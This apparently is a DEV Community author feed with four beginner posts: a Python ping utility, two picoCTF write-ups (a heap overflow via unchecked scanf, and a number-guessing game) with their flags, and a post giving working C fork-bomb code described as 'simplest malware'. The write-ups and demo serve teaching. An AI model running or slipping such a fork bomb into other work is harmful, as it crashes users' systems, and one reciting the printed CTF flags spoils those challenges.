DEV Community: notdonk

simple python IP pinger

notdonk — Wed, 30 Jul 2025 15:13:41 +0000

ill be showing you a example of a super simple ip pinger which works on all operating systems

from os import system   # for clearing the screen
import platform         # for identifying os
import subprocess       # for running other commands example ping

# ANSI color codes
YELLOW = "\033[33m"
GREEN = "\033[32m"
RED = "\033[31m"
RESET = "\033[0m"

# platform check to make program cross platform
if platform.system().lower() == 'windows':
    clear = 'cls'
else:
    clear = 'clear'

# whats point of a tool if u dont have ascii???
ascii = (r"""

    ██╗██████╗       ██████╗ ██╗███╗   ██╗ ██████╗ ███████╗██████╗ 
    ██║██╔══██╗      ██╔══██╗██║████╗  ██║██╔════╝ ██╔════╝██╔══██╗
    ██║██████╔╝█████╗██████╔╝██║██╔██╗ ██║██║  ███╗█████╗  ██████╔╝
    ██║██╔═══╝ ╚════╝██╔═══╝ ██║██║╚██╗██║██║   ██║██╔══╝  ██╔══██╗
    ██║██║           ██║     ██║██║ ╚████║╚██████╔╝███████╗██║  ██║
    ╚═╝╚═╝           ╚═╝     ╚═╝╚═╝  ╚═══╝ ╚═════╝ ╚══════╝╚═╝  ╚═╝


    """)

def ping(host):
    # diff command for diff OS
    if platform.system().lower() == 'windows':
        param = '-n'
    else:
        param = '-c'
    command = ['ping', param, '1', host] # command for the ping

    try:
        result = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        # subprocess.run - runs the command we give it
        # stdout=subprocess.PIPE - stores the success msg
        # stderr=subprocess.PIPE - stores the error msg
        return result.returncode == 0 # returns 0 [success] if no issues

    except Exception:
        return False # return false [error] if there is a issue

# main program
while True:
    system(clear) # clears screen
    print(ascii) # print our 10/10 ascii
    print(f"{GREEN}[!] select an option :{RESET}\n")
    print(f"{YELLOW}[1] start pinger{RESET}")
    print(f"{YELLOW}[2] exit{RESET}\n")

    opt = input(f"{YELLOW}[>] {RESET}")

    if opt == "1": # 
        system(clear)
        print(f"{GREEN}[!] enter ip :{RESET}")
        ip = input(f"{YELLOW}[>] {RESET}") # getting ip by user

        print(f"{GREEN}[!] pinging {ip} ...{RESET}")

        if ping(ip): # using our function to check if ip is reachable
            print(f"{GREEN}[+] {ip} is reachable!{RESET}")
        else:
            print(f"{RED}[-] {ip} is not reachable.{RESET}")

        input(f"\n{YELLOW}Press Enter to continue...{RESET}")

    elif opt == "2": # breaks out of while loop if user exits
        break

the actual logic behind this is extremely simple [it looks big cause of the extra ASCII and unnecessary look i gave it but honestly i don't really care is it ever a cool terminal tool if it doesn't have ASCII

[picoCTF] heap 0

notdonk — Wed, 30 Jul 2025 13:58:32 +0000

OVERVIEW

challenge link - https://play.picoctf.org/practice/challenge/438
difficulty level - easy

SOLUTION

so to solve this ctf we get

binary file of the program
source code of the program
connection to the remote instance

after examining the source code i see that the program allocates two variables input_data and safe_var

to get the flag we somehow need to change the value of safe_var from "bico" to something else
snippet of the check_win function

void check_win() {
    if (strcmp(safe_var, "bico") != 0) {
        printf("\nYOU WIN\n");

        // Print flag
        char buf[FLAGSIZE_MAX];
        FILE *fd = fopen("flag.txt", "r");
        fgets(buf, FLAGSIZE_MAX, fd);
        printf("%s\n", buf);
        fflush(stdout);

        exit(0);
    } else {
        printf("Looks like everything is still secure!\n");
        printf("\nNo flage for you :(\n");
        fflush(stdout);
    }
}

exploring further i found this

void write_buffer() {
    printf("Data for buffer: ");
    fflush(stdout);
    scanf("%s", input_data);
}

this is a huge security flaw as the input is not sanitized and we can overflow the input_data buffer allowing us to overwrite the adjacent memory locations including safe_var

to determine the exact string length required to overwrite safe_var i analyzed the memory layout of the program

Heap State:
+-------------+----------------+
[] Address -> Heap Data
+-------------+----------------+
[] 0x62dd9d4312b0 -> pico
+-------------+----------------+
[*] 0x62dd9d4312d0 -> bico
+-------------+----------------+

these are hex numbers so to find the difference between them we can use a online hex calculator

site i used - https://www.rapidtables.com/calc/math/hex-calculator.html?num1=0x63c3882552d0&op=1&num2=0x63c3882552b0

the difference is 32 bytes so we need to enter something which is atleast 33 bytes in this case i enter

u can enter anything which is more then 32 bytes after doing this when we print flag we get our beloved flag

FLAG

picoCTF{my_first_heap_overflow_c3935a08}

[picoCTF] Binary Search

notdonk — Wed, 30 Jul 2025 13:23:16 +0000

OVERVIEW

challenge link - https://play.picoctf.org/practice/challenge/442

difficulty level - easy

SOLUTION

just try to guess the number by taking large jumps like below

~/ctf ❯ ssh -p 61310 ctf-player@atlas.picoctf.net                                                                                   7m 23s 22:19:34
ctf-player@atlas.picoctf.net's password:
Permission denied, please try again.
ctf-player@atlas.picoctf.net's password:
Welcome to the Binary Search Game!
I'm thinking of a number between 1 and 1000.
Enter your guess: 500
Higher! Try again.
Enter your guess: 750
Lower! Try again.
Enter your guess: 625
Lower! Try again.
Enter your guess: 550
Lower! Try again.
Enter your guess: 525
Lower! Try again.
Enter your guess: 515
Higher! Try again.
Enter your guess: 520
Higher! Try again.
Enter your guess: 522
Higher! Try again.
Enter your guess: 523
Higher! Try again.
Enter your guess: 524
Congratulations! You guessed the correct number: 524
Here's your flag: picoCTF{g00d_gu355_ee8225d0}
Connection to atlas.picoctf.net closed.

FLAG

picoCTF{g00d_gu355_ee8225d0}

how to make the world's simplest malware in C

notdonk — Wed, 30 Jul 2025 07:56:22 +0000

before we start…
THIS CONTENT IS FOR EDUCATIONAL PURPOSES ONLY. DO NOT CREATE OR DISTRIBUTE MALICIOUS SOFTWARE.

a fork bomb basically clones itself until the system runs out of resources (which crashes the device)

#include <stdio.h>
#include <unistd.h>

int main() {
  fork();
  printf("hello world\n");
}

this is a basic demo of the fork(); function this will just clone itself once so you will get a output like

but to actually make it keep repeating it self you will need to do something like this

#include <stdio.h>
#include <unistd.h>
#include <stdbool.h>

int main() {
  while (true) {fork();}
}

this will keep cloning it self again and again and will crash your system this is probably the simplest malware there is

NOTE: PLEASE DO NOT RUN THIS PROGRAM ON ANY MACHINE [NOT EVEN YOUR OWN] PLEASE ONLY RUN THIS IN A VIRTUAL MACHINE THIS BLOG WAS ONLY FOR EDUCATIONAL PURPOSES